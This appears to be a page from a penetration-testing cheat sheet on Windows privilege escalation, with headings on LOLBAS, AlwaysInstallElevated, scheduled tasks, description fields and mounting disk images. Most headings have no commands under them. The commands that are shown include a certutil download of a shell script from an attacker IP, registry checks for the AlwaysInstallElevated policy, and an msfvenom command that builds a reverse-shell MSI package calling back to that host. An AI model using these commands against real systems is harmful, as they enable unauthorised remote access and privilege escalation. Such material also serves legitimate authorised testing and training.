Miscellaneous Techniques
LOLBAS
Transferring File with Certutil
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.batEncoding File with Certutil
certutil -encode file1 encodedfileDecoding File with Certutil
certutil -decode encodedfile file2Always Install Elevated
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\InstallerGenerating MSI Package
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msiTranferir archivo
Ponerse en escucha
Executing MSI Package
Scheduled Tasks
Enumerating Scheduled Tasks
Enumerating Scheduled Tasks with PowerShell
User/Computer Description Field
Checking Local User Description Field
Enumerating Computer Description Field with Get-WmiObject Cmdlet
Mount VHDX/VMDK
Mount VMDK on Linux
Mount VHD/VHDX on Linux
Last updated